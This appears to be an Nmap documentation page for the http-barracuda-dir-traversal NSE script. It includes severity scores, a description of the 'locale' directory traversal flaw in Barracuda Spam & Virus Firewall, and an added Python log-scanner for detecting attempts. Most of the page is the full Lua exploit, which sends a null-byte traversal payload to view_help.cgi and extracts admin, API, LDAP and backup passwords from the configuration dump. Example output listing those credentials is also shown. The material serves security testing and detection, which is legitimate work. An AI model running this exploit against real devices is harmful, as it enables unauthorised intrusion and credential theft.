
http-barracuda-dir-traversal NSE Script

2011-06-28 23:43:34
Brendan Coles
nmap.org

CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 10 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

EPSS: 0.973 High
Percentile: 99.8%

Attempts to retrieve the configuration settings from a Barracuda Networks Spam & Virus Firewall device using the directory traversal vulnerability described at <http://seclists.org/fulldisclosure/2010/Oct/119>.

This vulnerability is in the “locale” parameter of “/cgi-mod/view_help.cgi” or “/cgi-bin/view_help.cgi”, allowing the information to be retrieved from a MySQL database dump. The web administration interface runs on port 8000 by default.

Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval
Original exploit by ShadowHatesYou <[email protected]>
For more information, see:
<http://seclists.org/fulldisclosure/2010/Oct/119>
<http://www.exploit-db.com/exploits/15130/>
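From the defender's side, the request shape described above is easy to pick out of a web server access log: a GET to one of the two view_help.cgi paths whose locale parameter carries a traversal sequence, a null byte, or the config.snapshot file name, with a 200 response and a large body indicating that the dump was actually served (the same success criterion the script applies). The following Python is an added illustration written for this page; it is not part of the NSE script or the Nmap project. It assumes Apache-style Combined Log Format, the sample log lines are constructed (the Nmap Scripting Engine user agent shown is the NSE default, which the http.useragent argument listed below can override), and the function and constant names are this example's own.

```python
"""Flag attempts against the Barracuda view_help.cgi 'locale' traversal in
HTTP access logs.  Added example, not part of the NSE script.

Assumptions: Combined Log Format lines; sample lines below are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# host ident authuser [date] "METHOD target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# the two CGI paths named in the script
VULN_PATHS = {"/cgi-bin/view_help.cgi", "/cgi-mod/view_help.cgi"}


def is_traversal_attempt(target: str) -> bool:
    """True when the request hits view_help.cgi with a hostile locale value."""
    parts = urlsplit(target)
    if parts.path not in VULN_PATHS:
        return False
    # parse_qs already decodes once; decoding again catches double-encoded
    # "..%252f" style evasion.  keep_blank_values keeps "locale=" visible.
    for value in parse_qs(parts.query, keep_blank_values=True).get("locale", []):
        decoded = unquote(value)
        if ".." in decoded or "\x00" in decoded or "config.snapshot" in decoded:
            return True
    return False


def scan_log(lines):
    """Return one finding per traversal attempt.

    A 200 status with a non-empty body is what the NSE script itself treats
    as a successful retrieval, so such rows are marked 'likely-success';
    everything else is an 'attempt'.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_traversal_attempt(m["target"]):
            continue
        status = int(m["status"])
        size = 0 if m["size"] == "-" else int(m["size"])
        outcome = "likely-success" if status == 200 and size > 0 else "attempt"
        findings.append({
            "src": m["src"], "time": m["time"], "status": status,
            "size": size, "outcome": outcome, "ua": m["ua"] or "",
        })
    return findings


# Constructed sample: a probe of the bare path, the script's payload, a benign
# locale, and a double-encoded variant of the same payload that was refused.
NSE_UA = "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
SAMPLE_LOG = f"""\
203.0.113.7 - - [28/Jun/2011:23:43:01 +0000] "GET /cgi-bin/view_help.cgi HTTP/1.1" 200 812 "-" "{NSE_UA}"
203.0.113.7 - - [28/Jun/2011:23:43:02 +0000] "GET /cgi-bin/view_help.cgi?locale=/../../../../../../../mail/snapshot/config.snapshot%00 HTTP/1.1" 200 1482211 "-" "{NSE_UA}"
198.51.100.9 - - [28/Jun/2011:23:50:10 +0000] "GET /cgi-mod/view_help.cgi?locale=en_US HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.9 - - [28/Jun/2011:23:50:11 +0000] "GET /cgi-mod/view_help.cgi?locale=..%252f..%252fmail%252fsnapshot%252fconfig.snapshot HTTP/1.1" 404 0 "-" "curl/7.21.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{f['time']} {f['src']} {f['status']} {f['size']:>8} {f['outcome']} {f['ua']}")
```

Run against the constructed sample, the script reports the second line as likely-success (200 with a 1.4 MB body, consistent with a multi-hundred-user config dump) and the fourth as a failed attempt; the benign en_US request is not reported. A likely-success hit is the point at which the credentials listed in the script output (admin, API, LDAP, backup) should be treated as exposed and rotated.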

Script Arguments

http-max-cache-size

Set max cache size. The default value is 100,000. Barracuda config files vary in size mostly due to the number of users. Using a max cache size of 5,000,000 bytes should be enough for config files containing up to 5,000 users.

slaxml.debug

See the documentation for the slaxml library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

Example Usage

nmap --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p <port> <host>

Script Output

PORT   STATE SERVICE   REASON
8000/tcp open  http    syn-ack Barracuda Spam firewall http config
| http-barracuda-dir-traversal:
| Users: 256
| Device: Barracuda Spam Firewall
| Version: 4.1.0.0
| Hostname: barracuda
| Domain: example.com
| Timezone: America/Chicago
| Language: en_US
| Password: 123456
| API Password: 123456
| MTA SASL LDAP Password: 123456
| Gateway: 192.168.1.1
| Primary DNS: 192.168.1.2
| Secondary DNS: 192.168.1.3
| DNS Cache: No
| Backup Server: ftp.example.com
| Backup Port: 21
| Backup Type: ftp
| Backup Username: user
| Backup Password: 123456
| NTP Enabled: Yes
| NTP Server: update01.barracudanetworks.com
| SSH Enabled: Yes
| BRTS Enabled: No
| BRTS Server: fp.bl.barracudanetworks.com
| HTTP Port: 8000
| HTTP Disabled: No
| HTTPS Port: 443
| HTTPS Only: No
|
| Vulnerable to directory traversal vulnerability:
|_http://seclists.org/fulldisclosure/2010/Oct/119

Requires

http, shortport, stdnse, string, table

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"

description = [[
Attempts to retrieve the configuration settings from a Barracuda
Networks Spam & Virus Firewall device using the directory traversal
vulnerability described at
http://seclists.org/fulldisclosure/2010/Oct/119.

This vulnerability is in the "locale" parameter of
"/cgi-mod/view_help.cgi" or "/cgi-bin/view_help.cgi", allowing the
information to be retrieved from a MySQL database dump.  The web
administration interface runs on port 8000 by default.

Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval
Original exploit by ShadowHatesYou <[email protected]>
For more information, see:
http://seclists.org/fulldisclosure/2010/Oct/119
http://www.exploit-db.com/exploits/15130/
]]

---
-- @usage
-- nmap --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p <port> <host>
--
-- @args http-max-cache-size
--       Set max cache size. The default value is 100,000.
--       Barracuda config files vary in size mostly due to the number
--       of users. Using a max cache size of 5,000,000 bytes should be
--       enough for config files containing up to 5,000 users.
--
-- @output
-- PORT   STATE SERVICE   REASON
-- 8000/tcp open  http    syn-ack Barracuda Spam firewall http config
-- | http-barracuda-dir-traversal:
-- | Users: 256
-- | Device: Barracuda Spam Firewall
-- | Version: 4.1.0.0
-- | Hostname: barracuda
-- | Domain: example.com
-- | Timezone: America/Chicago
-- | Language: en_US
-- | Password: 123456
-- | API Password: 123456
-- | MTA SASL LDAP Password: 123456
-- | Gateway: 192.168.1.1
-- | Primary DNS: 192.168.1.2
-- | Secondary DNS: 192.168.1.3
-- | DNS Cache: No
-- | Backup Server: ftp.example.com
-- | Backup Port: 21
-- | Backup Type: ftp
-- | Backup Username: user
-- | Backup Password: 123456
-- | NTP Enabled: Yes
-- | NTP Server: update01.barracudanetworks.com
-- | SSH Enabled: Yes
-- | BRTS Enabled: No
-- | BRTS Server: fp.bl.barracudanetworks.com
-- | HTTP Port: 8000
-- | HTTP Disabled: No
-- | HTTPS Port: 443
-- | HTTPS Only: No
-- |
-- | Vulnerable to directory traversal vulnerability:
-- |_http://seclists.org/fulldisclosure/2010/Oct/119
--
-- @changelog
-- 2011-06-08 - created by Brendan Coles - itsecuritysolutions.org
-- 2011-06-10 - added user count
--            - looped path detection
-- 2011-06-15 - looped system info extraction
--            - changed service portrule to "barracuda"
--

author = "Brendan Coles"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"intrusive", "exploit", "auth"}


portrule = shortport.port_or_service (8000, "barracuda", {"tcp"})

action = function(host, port)

  local result = {}
  local paths = {"/cgi-bin/view_help.cgi", "/cgi-mod/view_help.cgi"}
  local payload = "?locale=/../../../../../../../mail/snapshot/config.snapshot%00"
  local user_count = 0
  local config_file = ""

  -- Loop through vulnerable files
  stdnse.debug1("Connecting to %s:%s", host.targetname or host.ip, port.number)
  for _, path in ipairs(paths) do

    -- Retrieve file
    local data = http.get(host, port, tostring(path))
    if data and data.status then

      -- Check if file exists
      stdnse.debug1("HTTP %s: %s", data.status, tostring(path))
      if tostring(data.status):match("200") then

        -- Attempt config file retrieval with LFI exploit
        stdnse.debug1("Exploiting: %s", tostring(path .. payload))
        data = http.get(host, port, tostring(path .. payload))
        if data and data.status and tostring(data.status):match("200") and data.body and data.body ~= "" then

          -- Check if the HTTP response contains a valid config file in MySQL database dump format
          if string.match(data.body, "DROP TABLE IF EXISTS config;") and string.match(data.body, "barracuda%.css") then
            config_file = data.body
            break
          end

        else
          stdnse.debug1("Failed to retrieve file: %s", tostring(path .. payload))
        end

      end

    else
      stdnse.debug1("Failed to retrieve file: %s", tostring(path))
    end

  end

  -- No config file found
  if config_file == "" then
    stdnse.debug1("%s:%s is not vulnerable or connection timed out.", host.targetname or host.ip, port.number)
    return
  end

  -- Extract system info from config file in MySQL dump format
  stdnse.debug1("Exploit success! Extracting system info from MySQL database dump")

  -- Count users
  if string.match(config_file, "'user_default_email_address',") then
    for _ in string.gmatch(config_file, "'user_default_email_address',") do user_count = user_count + 1 end
  end
  table.insert(result, string.format("Users: %s", user_count))

  -- Extract system info
  local vars = {
    {"Device", "branding_device_name"},
    {"Version","httpd_last_release_notes_version_read"},
    {"Hostname","system_default_hostname"},
    {"Domain","system_default_domain"},
    {"Timezone","system_timezone"},
    {"Language","default_ndr_lang"},
    {"Password","system_password"},
    {"API Password","api_password"},
    {"MTA SASL LDAP Password","mta_sasl_ldap_advanced_password"},
    {"Gateway","system_gateway"},
    {"Primary DNS","system_primary_dns_server"},
    {"Secondary DNS","system_secondary_dns_server"},
    {"DNS Cache","dns_cache"},
    {"Backup Server","backup_server"},
    {"Backup Port","backup_port"},
    {"Backup Type","backup_type"},
    {"Backup Username","backup_username"},
    {"Backup Password","backup_password"},
    {"NTP Enabled","system_ntp"},
    {"NTP Server","system_ntp_server"},
    {"SSH Enabled","system_ssh_enable"},
    {"BRTS Enabled","brts_enable"},
    {"BRTS Server","brts_lookup_domain"},
    {"HTTP Port","http_port"},
    {"HTTP Disabled","http_shutoff"},
    {"HTTPS Port","https_port"},
    {"HTTPS Only","https_only"},
  }
  for _, var in ipairs(vars) do
    local var_match = string.match(config_file, string.format("'%s','([^']+)','global',", var[2]))
    if var_match then table.insert(result, string.format("%s: %s", var[1], var_match)) end
  end

  table.insert(result, "\nVulnerable to directory traversal vulnerability:\nhttp://seclists.org/fulldisclosure/2010/Oct/119")

  -- Return results
  return stdnse.format_output(true, result)

end
